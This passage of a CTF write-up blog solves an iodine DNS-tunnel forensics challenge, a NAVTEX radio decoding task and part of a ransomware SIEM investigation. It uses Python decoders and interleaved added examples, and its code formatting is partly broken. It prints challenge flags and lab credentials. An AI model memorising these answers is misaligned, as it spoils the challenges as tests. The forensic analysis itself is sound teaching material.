rev128 = {ord(c): i for i, c in enumerate(cb128)}


def b128encode(data):
    # 7 input bytes -> 8 output symbols, 7 bits each, MSB first
    data = list(map(ord, data))  # byte values; list() keeps this valid on Python 3 too
    size = len(data)
    iin = 0
    buf = ''
    while 1:
        if iin >= size:
            break
        buf += cb128[((data[iin] & 0xfe) >> 1)]
        if iin >= size:
            break
        buf += cb128[((data[iin] & 0x01) << 6) | (((data[iin + 1] & 0xfc) >> 2) if (iin + 1 < size) else 0)]
        iin += 1
        if iin >= size:
            break
        buf += cb128[((data[iin] & 0x03) << 5) | (((data[iin + 1] & 0xf8) >> 3) if (iin + 1 < size) else 0)]
        iin += 1
        if iin >= size:
            break
        buf += cb128[((data[iin] & 0x07) << 4) | (((data[iin + 1] & 0xf0) >> 4) if (iin + 1 < size) else 0)]
        iin += 1
        if iin >= size:
            break
        buf += cb128[((data[iin] & 0x0f) << 3) | (((data[iin + 1] & 0xe0) >> 5) if (iin + 1 < size) else 0)]
        iin += 1
        if iin >= size:
            break
        buf += cb128[((data[iin] & 0x1f) << 2) | (((data[iin + 1] & 0xc0) >> 6) if (iin + 1 < size) else 0)]
        iin += 1
        if iin >= size:
            break
        buf += cb128[((data[iin] & 0x3f) << 1) | (((data[iin + 1] & 0x80) >> 7) if (iin + 1 < size) else 0)]
        iin += 1
        if iin >= size:
            break
        buf += cb128[(data[iin] & 0x7f)]
        iin += 1
    return buf


def b128decode(data):
    # 8 input symbols -> 7 output bytes; stops at a NUL or when fewer than 2 symbols remain
    data = list(map(ord, data))
    size = len(data)
    iin = 0
    buf = ''
    while 1:
        if iin + 1 >= size or data[iin] == 0 or data[iin + 1] == 0:
            break
        buf += chr(((rev128[data[iin]] & 0x7f) << 1) | ((rev128[data[iin + 1]] & 0x40) >> 6))
        iin += 1
        if iin + 1 >= size or data[iin] == 0 or data[iin + 1] == 0:
            break
        buf += chr(((rev128[data[iin]] & 0x3f) << 2) | ((rev128[data[iin + 1]] & 0x60) >> 5))
        iin += 1
        if iin + 1 >= size or data[iin] == 0 or data[iin + 1] == 0:
            break
        buf += chr(((rev128[data[iin]] & 0x1f) << 3) | ((rev128[data[iin + 1]] & 0x70) >> 4))
        iin += 1
        if iin + 1 >= size or data[iin] == 0 or data[iin + 1] == 0:
            break
        buf += chr(((rev128[data[iin]] & 0x0f) << 4) | ((rev128[data[iin + 1]] & 0x78) >> 3))
        iin += 1
        if iin + 1 >= size or data[iin] == 0 or data[iin + 1] == 0:
            break
        buf += chr(((rev128[data[iin]] & 0x07) << 5) | ((rev128[data[iin + 1]] & 0x7c) >> 2))
        iin += 1
        if iin + 1 >= size or data[iin] == 0 or data[iin + 1] == 0:
            break
        buf += chr(((rev128[data[iin]] & 0x03) << 6) | ((rev128[data[iin + 1]] & 0x7e) >> 1))
        iin += 1
        if iin + 1 >= size or data[iin] == 0 or data[iin + 1] == 0:
            break
        buf += chr(((rev128[data[iin]] & 0x01) << 7) | (rev128[data[iin + 1]] & 0x7f))
        iin += 2
    return buf
</code></pre></div>
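<p>As an added example (not the writeup's code, nor iodine's), the same 7-bit packing written as a loop, plus a parser for the upstream query layout that the extraction script below reads with <code>up_header()</code>: one hex userid character, three base32 header characters, the base128 payload, then the tunnel domain. The tunnel domain, userid, sequence numbers and payload here are constructed values, and the assumption that dots between payload labels are simply removed is mine.</p>

```python
"""Added example: loop-based iodine base128 codec and upstream header parser.
Python 3.  Everything here is an illustration, not the writeup's own code."""

# iodine's base128 alphabet: the 62 alphanumerics followed by the 66 byte
# values 0xBC..0xFD, kept as a latin-1 str so each symbol is one wire byte.
CB128 = ("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
         + "".join(chr(c) for c in range(0xBC, 0xFE)))
REV128 = {c: i for i, c in enumerate(CB128)}

# The three header characters use iodine's base32 alphabet (digits 0-5).
B32_IODINE = "abcdefghijklmnopqrstuvwxyz012345"


def b128encode(data: bytes) -> str:
    """Pack the input MSB-first into 7-bit groups, zero-padding the tail.
    This is exactly what the unrolled port does one byte at a time."""
    bits = "".join(format(b, "08b") for b in data)
    bits += "0" * (-len(bits) % 7)
    return "".join(CB128[int(bits[i:i + 7], 2)] for i in range(0, len(bits), 7))


def b128decode(text: str) -> bytes:
    """Inverse: concatenate the 7-bit values and emit whole bytes only, so the
    padding bits added by b128encode are dropped.  Rejects foreign symbols."""
    bad = [c for c in text if c not in REV128]
    if bad:
        raise ValueError("not iodine base128: %r" % bad[0])
    bits = "".join(format(REV128[c], "07b") for c in text)
    nbytes = len(bits) // 8
    return bytes(int(bits[8 * i:8 * i + 8], 2) for i in range(nbytes))


def parse_upstream_query(qname: str, topdomain: str) -> dict:
    """Split an upstream data query name (qname decoded as latin-1) into the
    fields up_header() extracts, plus the decoded payload.  Assumption: the
    payload may span several DNS labels, so label dots are removed."""
    topdomain = topdomain.rstrip(".")
    name = qname.rstrip(".")
    if not name.endswith("." + topdomain):
        raise ValueError("query is not for the tunnel domain")
    body = name[:-(len(topdomain) + 1)].replace(".", "")
    if len(body) < 4 or body[0].lower() not in "0123456789abcdef":
        raise ValueError("not an upstream data query")
    c1, c2, c3 = (B32_IODINE.index(ch.lower()) for ch in body[1:4])
    return {
        "userid": int(body[0], 16),
        "up_seq": (c1 >> 2) & 7,
        "up_frag": ((c1 & 3) << 2) | ((c2 >> 3) & 3),
        "dn_seq": c2 & 7,
        "dn_frag": c3 >> 1,
        "lastfrag": c3 & 1,
        "payload": b128decode(body[4:]),
    }


def demo() -> dict:
    # Constructed sample: userid 3, up_seq 5, up_frag 9, dn_seq 2, dn_frag 4,
    # lastfrag 1 encode to the header chars 'w', 'k', 'j'; payload "hello".
    qname = "3wkj" + b128encode(b"hello") + ".tunnel.example."
    return parse_upstream_query(qname, "tunnel.example.")


if __name__ == "__main__":
    print(demo())
```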
<div class="highlight"><pre><span></span><code>#!/usr/bin/env python
"""
Modified version of StalkR's script from
http://blog.stalkr.net/2010/10/hacklu-ctf-challenge-9-bottle-writeup.html
This version doesn't use any Popen calls, and ignores any errors while decoding
- krx
"""
import zlib
from base64 import b64encode, b64decode, b32encode, b32decode
from string import translate, maketrans
import chardet
from scapy.all import *
from base128_iodine import b128encode, b128decode

infile, outfile = "capture.pcap", "inception/extracted.pcap"
tld = "to.badland.com."
upstream_encoding = 128
# and no downstream encoding (type NULL)

# Translation tables for iodine's encoding
enctrans = {
    32: maketrans('ABCDEFGHIJKLMNOPQRSTUVWXYZ234567', 'ABCDEFGHIJKLMNOPQRSTUVWXYZ012345'),
    64: maketrans('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/', 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ-0123456789+')
}
dectrans = {
    32: maketrans('ABCDEFGHIJKLMNOPQRSTUVWXYZ012345', 'ABCDEFGHIJKLMNOPQRSTUVWXYZ234567'),
    64: maketrans('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ-0123456789+', 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/')
}

# iodine encoders/decoders
encoders = {
    32: lambda x: translate(b32encode(x), enctrans[32]),
    64: lambda x: translate(b64encode(x), enctrans[64]),
    128: b128encode
}
decoders = {
    32: lambda x: b32decode(translate(x, dectrans[32])),
    64: lambda x: b64decode(translate(x, dectrans[64])),
    128: b128decode
}


def encoder(base, encode="", decode=""):  # base=[32,64,128]
    funcmap, data = (encoders, encode) if len(encode) > 0 else (decoders, decode)
    return funcmap[base](data)


def uncompress(s):
    try:
        return zlib.decompress(s)
    except zlib.error:
        return False


def b32_8to5(a):
    # value of one character of iodine's base32 alphabet (digits 0-5)
    return "abcdefghijklmnopqrstuvwxyz012345".find(a.lower())


def up_header(p):
    # upstream query: 1 hex userid char, then 3 base32 chars packing seq/frag fields
    return {
        "userid": int(p[0], 16),
        "up_seq": (b32_8to5(p[1]) >> 2) & 7,
        "up_frag": ((b32_8to5(p[1]) & 3) << 2) | ((b32_8to5(p[2]) >> 3) & 3),
        "dn_seq": (b32_8to5(p[2]) & 7),
        "dn_frag": b32_8to5(p[3]) >> 1,
        "lastfrag": b32_8to5(p[3]) & 1
    }


def dn_header(p):
    # downstream answer: 2 raw header bytes
    return {
        "compress": ord(p[0]) >> 7,
        "up_seq": (ord(p[0]) >> 4) & 7,
        "up_frag": ord(p[0]) & 15,
        "dn_seq": (ord(p[1]) >> 1) & 15,
        "dn_frag": (ord(p[1]) >> 5) & 7,
        "lastfrag": ord(p[1]) & 1,
    }


# Extract packets from DNS tunnel
# Note: handles fragmentation, but not packet reordering (sequence numbers)
dn_pkt, up_pkt = '', ''
datasent = False
E = []
i = 0
# modified from rdpcap to PcapReader
with PcapReader(infile) as pcap_reader:
    for pkt in pcap_reader:
        i += 1
        if i % 1000 == 0:  # Just for progress
            print i
        if not pkt.haslayer(DNS):
            continue
        if DNSQR in pkt:
<span class="k">if</span> <span class="n">DNSRR</span> <span class="ow">in</span> <span class="n">pkt</span> <span class="ow">and</span> <span class="nb">len</span><span class="p">(</span><span class="n">pkt</span><span class="p">[</span><span class="n">DNSRR</span><span class="p">]</span><span class="o">.</span><span class="n">rdata</span><span class="p">)</span> <span class="o">></span> <span class="mi">0</span><span class="p">:</span> <span class="c1"># downstream/server</span>
<span class="n">d</span> <span class="o">=</span> <span class="n">pkt</span><span class="p">[</span><span class="n">DNSRR</span><span class="p">]</span><span class="o">.</span><span class="n">rdata</span>
<span class="k">if</span> <span class="n">datasent</span><span class="p">:</span> <span class="c1"># real data and no longer codec/fragment checks</span>
<span class="n">dn_pkt</span> <span class="o">+=</span> <span class="n">d</span><span class="p">[</span><span class="mi">2</span><span class="p">:]</span>
<span class="k">if</span> <span class="n">dn_header</span><span class="p">(</span><span class="n">d</span><span class="p">)[</span><span class="s1">'lastfrag'</span><span class="p">]</span> <span class="ow">and</span> <span class="nb">len</span><span class="p">(</span><span class="n">dn_pkt</span><span class="p">)</span> <span class="o">></span> <span class="mi">0</span><span class="p">:</span>
<span class="n">u</span> <span class="o">=</span> <span class="n">uncompress</span><span class="p">(</span><span class="n">dn_pkt</span><span class="p">)</span>
<span class="k">if</span> <span class="n">u</span><span class="p">:</span>
<span class="c1"># Include the packet if decoding succeeded,</span>
<span class="c1"># ignore it and move on otherwise</span>
<span class="n">E</span> <span class="o">+=</span> <span class="p">[</span><span class="n">IP</span><span class="p">(</span><span class="n">u</span><span class="p">[</span><span class="mi">4</span><span class="p">:])]</span>
<span class="n">dn_pkt</span> <span class="o">=</span> <span class="s1">''</span>
<span class="k">else</span><span class="p">:</span> <span class="c1"># upstream/client</span>
<span class="n">d</span> <span class="o">=</span> <span class="n">pkt</span><span class="p">[</span><span class="n">DNSQR</span><span class="p">]</span><span class="o">.</span><span class="n">qname</span>
<span class="nb">print</span><span class="p">(</span><span class="nb">str</span><span class="p">(</span><span class="n">d</span><span class="p">[</span><span class="mi">0</span><span class="p">]))</span>
<span class="k">if</span> <span class="n">d</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span><span class="o">.</span><span class="n">lower</span><span class="p">()</span> <span class="ow">in</span> <span class="s2">"0123456789abcdef"</span><span class="p">:</span>
<span class="n">datasent</span> <span class="o">=</span> <span class="kc">True</span>
<span class="n">up_pkt</span> <span class="o">+=</span> <span class="n">d</span><span class="p">[</span><span class="mi">5</span><span class="p">:</span><span class="o">-</span><span class="nb">len</span><span class="p">(</span><span class="n">tld</span><span class="p">)]</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="s2">"."</span><span class="p">,</span> <span class="s2">""</span><span class="p">)</span>
<span class="k">if</span> <span class="n">up_header</span><span class="p">(</span><span class="n">d</span><span class="p">)[</span><span class="s1">'lastfrag'</span><span class="p">]</span> <span class="ow">and</span> <span class="nb">len</span><span class="p">(</span><span class="n">up_pkt</span><span class="p">)</span> <span class="o">></span> <span class="mi">0</span><span class="p">:</span>
<span class="n">u</span> <span class="o">=</span> <span class="n">uncompress</span><span class="p">(</span><span class="n">encoder</span><span class="p">(</span><span class="n">upstream_encoding</span><span class="p">,</span> <span class="n">decode</span><span class="o">=</span><span class="n">up_pkt</span><span class="p">))</span>
<span class="k">if</span> <span class="n">u</span><span class="p">:</span>
<span class="c1"># Include the packet if decoding succeeded,</span>
<span class="c1"># ignore it and move on otherwise</span>
<span class="n">E</span> <span class="o">+=</span> <span class="p">[</span><span class="n">IP</span><span class="p">(</span><span class="n">u</span><span class="p">[</span><span class="mi">4</span><span class="p">:])]</span>
<span class="n">up_pkt</span> <span class="o">=</span> <span class="s1">''</span>
<span class="n">wrpcap</span><span class="p">(</span><span class="n">outfile</span><span class="p">,</span> <span class="n">E</span><span class="p">)</span>
<span class="nb">print</span> <span class="s2">"Successfully extracted </span><span class="si">%i</span><span class="s2"> packets into </span><span class="si">%s</span><span class="s2">"</span> <span class="o">%</span> <span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">E</span><span class="p">),</span> <span class="n">outfile</span><span class="p">)</span>
</code></pre></div>
<p>We get the following result:</p>
<div class="highlight"><pre><span></span><code>$ python2 python2.py
Successfully extracted <span class="m">11</span> packets into inception/extracted.pcap
</code></pre></div>
<p>We then read the extracted capture with <code>tshark</code> and follow TCP stream 0:</p>
<div class="highlight"><pre><span></span><code>$ tshark -q -r inception/extracted.pcap -z follow,tcp,ascii,0
<span class="o">===================================================================</span>
Follow: tcp,ascii
Filter: tcp.stream eq <span class="m">0</span>
Node <span class="m">0</span>: <span class="m">10</span>.0.0.2:50568
Node <span class="m">1</span>: <span class="m">10</span>.0.0.1:1664
<span class="m">1078</span>
flag.txt............................................................................................000644 .000000 .000000 .00000000046 <span class="m">13542743565</span> <span class="m">012524</span>. <span class="m">0</span>....................................................................................................ustar.00root............................root............................000000 .000000 ........................................................................................................................................................................ECW<span class="o">{</span>E58B25A5943223922CA75B6AE6F06413<span class="o">}</span>
................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
<span class="m">970</span>
..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
<span class="o">===================================================================</span>
</code></pre></div>
<p>YEAH! We have the flag. It still needs cleaning up (note that the <code>tr</code> pass below also lowercases the hex digits of the flag itself, which were upper case on the wire):</p>
<div class="highlight"><pre><span></span><code>$ tshark -q -r inception/extracted.pcap -z follow,tcp,ascii,0 <span class="p">|</span> tr <span class="s1">'[:upper:]'</span> <span class="s1">'[:lower:]'</span> <span class="p">|</span> sed <span class="s1">'s/\.//g'</span> <span class="p">|</span> sed <span class="s1">'s/ecw/ECW/g'</span>
<span class="o">===================================================================</span>
follow: tcp,ascii
filter: tcpstream eq <span class="m">0</span>
node <span class="m">0</span>: <span class="m">10002</span>:50568
node <span class="m">1</span>: <span class="m">10001</span>:1664
<span class="m">1078</span>
flagtxt000644 <span class="m">000000</span> <span class="m">000000</span> <span class="m">00000000046</span> <span class="m">13542743565</span> <span class="m">012524</span> 0ustar00rootroot000000 <span class="m">000000</span> ECW<span class="o">{</span>e58b25a5943223922ca75b6ae6f06413<span class="o">}</span>
<span class="nv">970</span>
<span class="o">===================================================================</span>
</code></pre></div>
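<p>A safer way to get the file back than the <code>tr</code>/<code>sed</code> pass: the stream is a tar archive (the <code>ustar</code> magic and the <code>flag.txt</code> header are visible above, and the dots are tshark's rendering of the NUL padding), so it is better carved as binary than cleaned as text. The following Python is an added example, not part of the write-up: it parses the hex dump that <code>tshark -q -r inception/extracted.pcap -z follow,tcp,raw,0</code> would produce (the banner lines and the tab indentation of server-side data are assumptions about that format, and the sample is built in memory around the flag quoted above rather than read from the capture) and opens the result with <code>tarfile</code>.</p>

```python
"""Carve flag.txt out of a tunnelled TCP stream as a tar archive.

Added example, not the write-up's own commands. The follow-raw output is
constructed here: a ustar archive built in memory around the flag shown by
tshark above, wrapped in the banner lines tshark prints, with server-side
data tab-indented (assumption about tshark's raw follow format).
"""
import io
import tarfile

FLAG = b"ECW{E58B25A5943223922CA75B6AE6F06413}\n"  # flag as shown by tshark above


def build_tar(name, data):
    """Build a ustar archive in memory holding one regular file."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w", format=tarfile.USTAR_FORMAT) as tar:
        info = tarfile.TarInfo(name)
        info.size = len(data)
        tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def fake_follow_raw(client_bytes, server_bytes):
    """Constructed `tshark -z follow,tcp,raw` output: one hex line per segment,
    server->client lines indented with a tab (assumed format)."""
    lines = ["", "===================================================================",
             "Follow: tcp,raw", "Filter: tcp.stream eq 0",
             "Node 0: 10.0.0.2:50568", "Node 1: 10.0.0.1:1664"]
    for i in range(0, len(client_bytes), 1024):          # mimic 1024-byte segments
        lines.append(client_bytes[i:i + 1024].hex())
    for i in range(0, len(server_bytes), 1024):
        lines.append("\t" + server_bytes[i:i + 1024].hex())
    lines.append("===================================================================")
    return "\n".join(lines) + "\n"


def split_follow_raw(text):
    """Parse follow-raw output into (client->server, server->client) byte strings.
    Banner lines are not valid hex and are skipped by the decode attempt."""
    client, server = bytearray(), bytearray()
    for line in text.splitlines():
        if not line:
            continue
        try:
            chunk = bytes.fromhex(line.lstrip("\t").strip())
        except ValueError:
            continue
        (server if line.startswith("\t") else client).extend(chunk)
    return bytes(client), bytes(server)


def read_tar_member(blob, name):
    """Open the byte stream as a tar archive and return one member's content, or None."""
    try:
        with tarfile.open(fileobj=io.BytesIO(blob), mode="r:") as tar:
            for member in tar:
                if member.isfile() and member.name == name:
                    return tar.extractfile(member).read()
    except tarfile.TarError:
        return None
    return None


def recover_flag(follow_text):
    """Check both directions: the tunnel client may have pushed or pulled the file."""
    for direction in split_follow_raw(follow_text):
        data = read_tar_member(direction, "flag.txt")
        if data is not None:
            return data.decode().strip()
    return None


if __name__ == "__main__":
    sample = fake_follow_raw(build_tar("flag.txt", FLAG), b"")
    print(recover_flag(sample))
```

<p>With a real capture, pipe the tshark raw output into <code>split_follow_raw</code> instead of <code>fake_follow_raw</code>; the archive then comes out byte-exact, case and NULs included, with nothing for <code>tr</code> to mangle.</p>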
<p>Done! That's 50 points in the bag :).</p>
<p><em>ECW - Radio intercept</em> (nlegall, 2019-11-22, <a href="/ecw-radio-intercept.html">ecw-radio-intercept.html</a>)</p>
<div class="highlight"><pre><span></span><code>Radio intercept (50 points)
Our technical teams have intercepted a mysterious radio message coming from a ship, can you investigate it?
</code></pre></div>
<p>This was the only audio steganography challenge of the final.</p>
<p>From the statement we know it is a radio exchange between ships, so the place to look is the regulations governing maritime radio traffic. A <a href="https://fr.wikipedia.org/wiki/Radio_maritime">Wikipedia</a> article lists most of the frequencies. First we need to find the frequency used in the recording, to know where to look.</p>
<p>Open the file in Audacity, switch the track to the <code>Spectrogram</code> view and zoom in:</p>
<p><img alt="navtex0.png" src="https://blog.nlegall.fr/images/ecw/navtex0.png"></p>
<p>The carrier appears to sit at around 515 Hz.</p>
<p>Searching online for a way to decode these messages quickly turns up this Java application: <a href="http://www.frisnit.com/navtex/">Frisnit Navtex Decoder</a>. It transcribes the audio exchange, but it also needs to be told the frequency, since it defaults to 1000 Hz.</p>
<p><img alt="navtex1.png" src="https://blog.nlegall.fr/images/ecw/navtex1.png"></p>
<p>We then play the audio file through any media player (<code>VLC</code>, <code>mpv</code>...). The spectrogram appears in the decoder and lets us click on the frequency of interest:</p>
<p><img alt="navtex2.png" src="https://blog.nlegall.fr/images/ecw/navtex2.png"></p>
<p>Click on it and restart the audio file:</p>
<p><img alt="navtex3.png" src="https://blog.nlegall.fr/images/ecw/navtex3.png"></p>
<p>The frequency peak now sits between the adjustable bounds, and the text starts to appear by itself in the application window!</p>
<p><img alt="navtex4.png" src="https://blog.nlegall.fr/images/ecw/navtex4.png"></p>
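<p>To show what the decoder is doing once it knows the carrier, here is an added example in Python; it is neither the write-up's code nor the Frisnit decoder's. NAVTEX is SITOR-B: 100 baud FSK with a 170 Hz shift and 7-bit CCIR 476 characters that always carry four marks and three spaces. The script synthesises such a burst centred on the 515 Hz seen in the spectrogram, locates the mark/space tone pair from the signal (the two bright lines in the screenshots, whose midpoint is the carrier the write-up read off by eye), slices bits and maps the codes back to letters, flagging any symbol that fails the 4:3 check. The tone polarity (mark on the upper tone), the LSB-first bit order and the absence of SITOR-B's DX/RX repetition and phasing are simplifications of this toy, not claims about the standard, and the message content is constructed.</p>

```python
"""Decode a NAVTEX-style FSK burst: find the tones, slice bits, map CCIR 476 codes.

Added example, not the write-up's code and not the Frisnit decoder. Assumptions
of this toy (not statements about the standard): mark (1) on the upper tone,
LSB-first bit order, no DX/RX repetition, no phasing sequence, constructed text.
"""
import math

SAMPLE_RATE = 8000
BAUD = 100
CENTER_HZ = 515.0                      # carrier read off the spectrogram
SHIFT_HZ = 170.0
MARK_HZ = CENTER_HZ + SHIFT_HZ / 2     # assumption: mark = upper tone (600 Hz)
SPACE_HZ = CENTER_HZ - SHIFT_HZ / 2    # 430 Hz
SAMPLES_PER_BIT = SAMPLE_RATE // BAUD  # 80 samples per bit at 100 baud

# CCIR 476 letters case: every code has exactly four 1 bits and three 0 bits.
CCIR476_LETTERS = {
    "A": 0x47, "B": 0x72, "C": 0x1D, "D": 0x53, "E": 0x56, "F": 0x1B, "G": 0x35,
    "H": 0x69, "I": 0x4D, "J": 0x17, "K": 0x1E, "L": 0x65, "M": 0x39, "N": 0x59,
    "O": 0x71, "P": 0x2D, "Q": 0x2E, "R": 0x55, "S": 0x4B, "T": 0x74, "U": 0x4E,
    "V": 0x3C, "W": 0x27, "X": 0x3A, "Y": 0x33, "Z": 0x63, " ": 0x5C,
    "\r": 0x78, "\n": 0x6C,
}
CODE_TO_CHAR = {v: k for k, v in CCIR476_LETTERS.items()}


def is_valid_code(code):
    """The 4:3 mark/space ratio is CCIR 476's built-in error detection."""
    return bin(code).count("1") == 4


def text_to_bits(text):
    bits = []
    for ch in text.upper():
        code = CCIR476_LETTERS[ch]
        bits.extend((code >> i) & 1 for i in range(7))   # LSB first (assumption)
    return bits


def modulate(bits):
    """Continuous-phase FSK so bit boundaries do not click."""
    samples, phase = [], 0.0
    for b in bits:
        step = 2 * math.pi * (MARK_HZ if b else SPACE_HZ) / SAMPLE_RATE
        for _ in range(SAMPLES_PER_BIT):
            samples.append(math.sin(phase))
            phase += step
    return samples


def tone_energy(chunk, freq):
    """Energy at one frequency: correlate with a sine/cosine pair (one DFT bin)."""
    re = im = 0.0
    for n, x in enumerate(chunk):
        ang = 2 * math.pi * freq * n / SAMPLE_RATE
        re += x * math.cos(ang)
        im += x * math.sin(ang)
    return re * re + im * im


def bit_chunks(samples):
    return [samples[s:s + SAMPLES_PER_BIT]
            for s in range(0, len(samples) - SAMPLES_PER_BIT + 1, SAMPLES_PER_BIT)]


def find_tone_pair(samples, lo_hz=300, hi_hz=800, step_hz=5):
    """Sum per-bit energies over a frequency sweep: the two strongest peaks are the
    mark and space tones, and their midpoint is the carrier seen in Audacity."""
    chunks = bit_chunks(samples)
    freqs = list(range(lo_hz, hi_hz + 1, step_hz))
    power = [sum(tone_energy(c, float(f)) for c in chunks) for f in freqs]
    peaks = [(power[i], freqs[i]) for i in range(1, len(freqs) - 1)
             if power[i] > power[i - 1] and power[i] > power[i + 1]]
    lo, hi = sorted(f for _, f in sorted(peaks, reverse=True)[:2])
    return lo, hi, (lo + hi) / 2


def demodulate(samples):
    """Hard decision per bit: whichever tone carries more energy wins."""
    return [1 if tone_energy(c, MARK_HZ) > tone_energy(c, SPACE_HZ) else 0
            for c in bit_chunks(samples)]


def bits_to_text(bits):
    out = []
    for i in range(0, len(bits) - 6, 7):
        code = sum(bit << k for k, bit in enumerate(bits[i:i + 7]))
        # A flipped bit breaks the 4:3 ratio; flag it rather than guess a letter.
        out.append(CODE_TO_CHAR.get(code, "?") if is_valid_code(code) else "?")
    return "".join(out)


def roundtrip(message):
    return bits_to_text(demodulate(modulate(text_to_bits(message))))


if __name__ == "__main__":
    audio = modulate(text_to_bits("ZCZC FLAG"))
    print(find_tone_pair(audio))
    print(bits_to_text(demodulate(audio)))
```

<p>A real recording adds what this toy leaves out: the decoder has to lock onto the 100 baud bit clock from the phasing sequence, and SITOR-B sends every character twice (DX then RX) so that a symbol failing the 4:3 check can be replaced by its repeat rather than printed as an error.</p>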
<p>There's the flag, and 50 more points :D.</p>
<p><em>ECW - SIEM investigation</em> (nlegall, 2019-11-22, <a href="/ecw-siem-investigation.html">ecw-siem-investigation.html</a>)</p>
<div class="highlight"><pre><span></span><code>SIEM investigation (100 points)
One of our employees, Robert, found a USB key on the harbour dock while walking around during his break and decided to connect it to his workstation. Being very curious, he decided to open files contained in the key. Unfortunately for him, one of the files contained ransomware and all his documents are now encrypted.
The events of his workstation are available in the Graylog SIEM of the Harbour Master's Office (HMO) LAN following this URL https://hmo-graylog.harbour.lan:8443 and using these credentials: analyst / ecw2019
Investigate to understand how the machine was infected, what traces were left on the system, and which files were impacted by the ransomware:
- What is the name of the USB stick that Robert has plugged into his computer?
- What is the name of the file opened by Robert who is behind the ransomware execution?
- How many files have been encrypted?
- The ransomware has implemented a way of persistence on the system. What is the name of the file that will be executed to maintain the ransomware on the system?
Note: To convert your answers into flags, you have to compute the SHA1 hash of your answer =&gt; ECW{SHA1(answer)}.
</code></pre></div>
<h1>USB key name</h1>
<p>This is probably the step that took us the longest. Not being familiar with the log management system (Graylog), I ended up finding a way to export all the logs to a CSV file so I could use good old <code>grep</code> locally.</p>
<p>The hard part: where do you look to find the name of a USB key in the logs of a Windows machine?</p>
<p>After some research, we ended up with a list of Windows registry keys worth checking for USB devices (keys under the SYSTEM and SOFTWARE hives, which is where Sysmon's registry events point):</p>
<table>
<thead>
<tr>
<th>Information</th>
<th>Registry key</th>
</tr>
</thead>
<tbody>
<tr>
<td>Serial number</td>
<td>SYSTEM\CurrentControlSet\Enum\USBSTOR</td>
</tr>
<tr>
<td>Volume name</td>
<td>SOFTWARE\Microsoft\Windows Portable Devices\Devices</td>
</tr>
<tr>
<td>Vendor/product ID</td>
<td>SYSTEM\CurrentControlSet\Enum\USB</td>
</tr>
<tr>
<td>Drive letter of the mounted volume</td>
<td>SYSTEM\MountedDevices</td>
</tr>
</tbody>
</table>
<p>The one that matters here is <code>SOFTWARE\Microsoft\Windows Portable Devices\Devices</code>. More precisely, we want a log entry in which a value under this key is set (Sysmon event ID 13, "Registry value set"), which is the moment the key's friendly name gets written to the registry:</p>
<div class="highlight"><pre><span></span><code>$ grep -E <span class="s1">'Registry value set.*SOFTWARE\\Microsoft\\Windows Portable Devices\\Devices'</span> logs.csv
<span class="s2">"2019-09-27T08:26:56.000Z"</span>,<span class="s2">"DESKTOP-F5ERMDT"</span>,<span class="s2">"SYSTEM"</span>,<span class="s2">"User"</span>,,,<span class="s2">"Registry value set (rule: RegistryEvent)"</span>,<span class="s2">"Microsoft-Windows-Sysmon/Operational"</span>,,,,<span class="s2">"MONEY"</span>,<span class="s2">"NT AUTHORITY"</span>,<span class="s2">"13"</span>,<span class="s2">"2019-09-27 10:26:57"</span>,<span class="s2">"INFO"</span>,,,<span class="s2">"01DNRX9681QWSJFZDQA7G3ZB91"</span>,,,<span class="s2">"C:\Windows\system32\DrvInst.exe"</span>,,<span class="s2">"-9223372036854775808"</span>,,,<span class="s2">"6"</span>,<span class="s2">"Registry value set:\\r\\nRuleName: \\r\\nEventType: SetValue\\r\\nUtcTime: 2"</span>,<span class="s2">"Info"</span>,<span class="s2">"0"</span>,,<span class="s2">"{6b71f96b-c7cd-5d8d-0000-00102b6b3400}"</span>,<span class="s2">"3252"</span>,,,,<span class="s2">"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}"</span>,<span class="s2">"505173"</span>,<span class="s2">"INFO"</span>,<span class="s2">"2"</span>,,,,,,<span class="s2">"event"</span>,<span class="s2">"im_msvistalog"</span>,<span class="s2">"Microsoft-Windows-Sysmon"</span>,,,,,,,,,,,,<span class="s2">"HKLM\SOFTWARE\Microsoft\Windows Portable Devices\Devices\SWD#WPDBUSENUM#_??_USBSTOR#DISK&amp;VEN_GENERIC&amp;PROD_FLASH_DISK&amp;REV_8.07#801257DC&amp;0#{53F56307-B6BF-11D0-94F2-00A0C91EFB8B}\FriendlyName"</span>,,,<span class="s2">"13"</span>,<span class="s2">"5048"</span>,<span class="s2">"S-1-5-18"</span>,<span class="s2">"2019-09-27 08:26:56.186"</span>,<span class="s2">"2"</span>
<span class="s2">"2019-09-27T08:26:56.000Z"</span>,<span class="s2">"DESKTOP-F5ERMDT"</span>,<span class="s2">"SYSTEM"</span>,<span class="s2">"User"</span>,,,<span class="s2">"Registry value set (rule: RegistryEvent)"</span>,<span class="s2">"Microsoft-Windows-Sysmon/Operational"</span>,,,,<span class="s2">"MONEY"</span>,<span class="s2">"NT AUTHORITY"</span>,<span class="s2">"13"</span>,<span class="s2">"2019-09-27 10:26:57"</span>,<span class="s2">"INFO"</span>,,,<span class="s2">"01DNRX965ESSGJP7897MG28R60"</span>,,,<span class="s2">"C:\Windows\System32\WUDFHost.exe"</span>,,<span class="s2">"-9223372036854775808"</span>,,,<span class="s2">"6"</span>,<span class="s2">"Registry value set:\\r\\nRuleName: \\r\\nEventType: SetValue\\r\\nUtcTime: 2"</span>,<span class="s2">"Info"</span>,<span class="s2">"0"</span>,,<span class="s2">"{6b71f96b-c7cf-5d8d-0000-0010b0c53400}"</span>,<span class="s2">"3252"</span>,,,,<span class="s2">"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}"</span>,<span class="s2">"505127"</span>,<span class="s2">"INFO"</span>,<span class="s2">"2"</span>,,,,,,<span class="s2">"event"</span>,<span 